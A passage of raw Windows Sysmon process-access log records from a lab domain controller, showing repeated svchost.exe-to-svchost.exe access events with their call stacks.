EM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 